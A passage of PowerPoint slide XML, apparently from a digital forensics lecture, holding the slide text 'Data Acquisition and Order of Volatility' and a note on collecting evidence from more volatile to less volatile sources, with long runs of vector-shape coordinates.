                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>e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.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-22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c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ov</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ers: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450">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="5025390" marR="4264660">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Computer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>off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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>state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23308" y="306451"/>
            <a:ext cx="7007859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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquisition</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Order</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Volatility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2676" y="760476"/>
            <a:ext cx="10152888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50288" y="1882292"/>
            <a:ext cx="13110844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68350" marR="5080" indent="-756285">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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main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premise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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>collect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evidence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order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increasing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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volatility,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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from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more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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>volatile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less </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>volatile.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general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order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followed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evidence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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>collection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archiving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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>shown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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>below: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241793" y="3147729"/>
            <a:ext cx="1277620" cy="1289685"/>
            <a:chOff x="2241793" y="3147729"/>
            <a:chExt cx="1277620" cy="1289685"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2241793" y="3147729"/>
              <a:ext cx="1277620" cy="1289685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1277620" h="1289685">
                  <a:moveTo>
                    <a:pt x="629890" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="583590" y="2710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537992" y="8702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493244" y="17879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449491" y="30142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406882" y="45394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365562" y="63537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325679" y="84474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287379" y="108105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250809" y="134335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216117" y="163064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183448" y="194196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152950" y="227632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124770" y="263274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99054" y="301026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75950" y="340789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55604" y="382465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38163" y="425958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23773" y="471168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12583" y="517998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4844" y="565523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="612787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="659643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="705943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8680" y="751540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17848" y="796289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30105" y="840041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45351" y="882651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63490" y="923970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84424" y="963854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108055" y="1002153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134285" y="1038723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163017" y="1073416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194152" y="1106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227594" y="1136582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263244" y="1164762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301004" y="1190478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340777" y="1213582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382465" y="1233929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425971" y="1251370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471196" y="1265759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518043" y="1276950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565568" y="1284688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612832" y="1288850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659688" y="1289533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705988" y="1286834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751585" y="1280852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796333" y="1271684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840086" y="1259428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882695" y="1244181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924015" y="1226042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963898" y="1205108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002198" y="1181477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038768" y="1155247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073461" y="1126516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106129" y="1095380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136627" y="1061938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164807" y="1026289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190523" y="988528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213627" y="948755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1233973" y="907067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251415" y="863561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265804" y="818336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276995" y="771490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644789" y="644744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771535" y="12538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724009" y="4816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676745" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629890" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="70BC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362086" y="3268104"/>
              <a:ext cx="1049020" cy="1049020"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1049020" h="1049020">
                  <a:moveTo>
                    <a:pt x="533531" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487240" y="1196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441743" y="6420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397257" y="15527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354001" y="28373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312193" y="44811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272051" y="64697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233793" y="87886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197638" y="114232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163804" y="143590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132508" y="175815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103970" y="210762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78407" y="248286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56038" y="288241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37080" y="330483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21753" y="374866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10273" y="421245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2977" y="468487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="515368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196" y="561669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6420" y="607175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15527" y="651666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28373" y="694925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44811" y="736735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64697" y="776878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87886" y="815136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114232" y="851291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143590" y="885126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175815" y="916423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210762" y="944964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248286" y="970532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288241" y="992910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330483" y="1011878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374866" y="1027221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421245" y="1038719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468468" y="1045995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515334" y="1048955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561625" y="1047743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607122" y="1042505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651608" y="1033386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694864" y="1020530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736672" y="1004083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776814" y="984190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815072" y="960995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851227" y="934644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885062" y="905283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916357" y="873055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944895" y="838106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="970458" y="800580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992827" y="760624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011785" y="718382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027113" y="673999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038592" y="627620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045888" y="580398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1048866" y="533535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047670" y="487249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042445" y="441758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033338" y="397278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020492" y="354029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004054" y="312228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984168" y="272093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960979" y="233841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934633" y="197690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905275" y="163859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873050" y="132565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838103" y="104025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800579" y="78458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760624" y="56082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718382" y="37114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673999" y="21771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627620" y="10273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580397" y="2977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533531" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="31736C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5763548" y="3147729"/>
            <a:ext cx="1277620" cy="1289685"/>
            <a:chOff x="5763548" y="3147729"/>
            <a:chExt cx="1277620" cy="1289685"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5763548" y="3147729"/>
              <a:ext cx="1277620" cy="1289685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1277620" h="1289685">
                  <a:moveTo>
                    <a:pt x="629933" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="583625" y="2710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538021" y="8702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493268" y="17879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449513" y="30142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406902" y="45394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365581" y="63537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325697" y="84474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287397" y="108105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250828" y="134335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216135" y="163064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183465" y="194196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152966" y="227632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124783" y="263274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99063" y="301026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75952" y="340789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55598" y="382465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38146" y="425958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23744" y="471168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538" y="517998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4816" y="565523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="612787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="659643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2710" y="705943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8702" y="751540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17879" y="796289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30142" y="840041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45394" y="882651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63537" y="923970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84474" y="963854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108105" y="1002153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134335" y="1038723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163064" y="1073416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194196" y="1106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227632" y="1136582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263274" y="1164762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301026" y="1190478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340789" y="1213582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382465" y="1233929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425958" y="1251370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471168" y="1265759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517998" y="1276950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565539" y="1284688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612816" y="1288850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659682" y="1289533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705990" y="1286834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751593" y="1280852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796346" y="1271684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840101" y="1259428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882713" y="1244181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924033" y="1226042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963917" y="1205108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002217" y="1181477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038787" y="1155247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073480" y="1126516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106149" y="1095380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136649" y="1061938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164832" y="1026289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1190552" y="988528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213662" y="948755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234016" y="907067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251468" y="863561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265870" y="818336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277077" y="771490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644871" y="644744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771617" y="12538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724075" y="4816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676798" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629933" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CF5C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883796" y="3268104"/>
              <a:ext cx="1049020" cy="1049020"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1049020" h="1049020">
                  <a:moveTo>
                    <a:pt x="533535" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487249" y="1196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441757" y="6420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397278" y="15527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354029" y="28373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312228" y="44811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272092" y="64697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233841" y="87886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197690" y="114232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163859" y="143590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132565" y="175815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104025" y="210762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78458" y="248286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56082" y="288241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37113" y="330483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21771" y="374866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10273" y="421245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2977" y="468487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="515368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196" y="561669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6421" y="607175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15530" y="651666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28377" y="694925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44819" y="736735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64708" y="776878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87902" y="815136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114254" y="851291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143619" y="885126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175853" y="916423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210810" y="944964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248346" y="970532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288315" y="992910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330572" y="1011878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374973" y="1027221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421372" y="1038719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468594" y="1045995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515457" y="1048955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561743" y="1047743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607234" y="1042505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651714" y="1033386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694963" y="1020530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736764" y="1004083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776899" y="984190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815151" y="960995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851302" y="934644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885133" y="905283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916427" y="873055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944967" y="838106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="970534" y="800580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992910" y="760624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011878" y="718382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027221" y="673999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038719" y="627620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046015" y="580398"/>
                  </a:lnTo>
                  <a:lnTo>
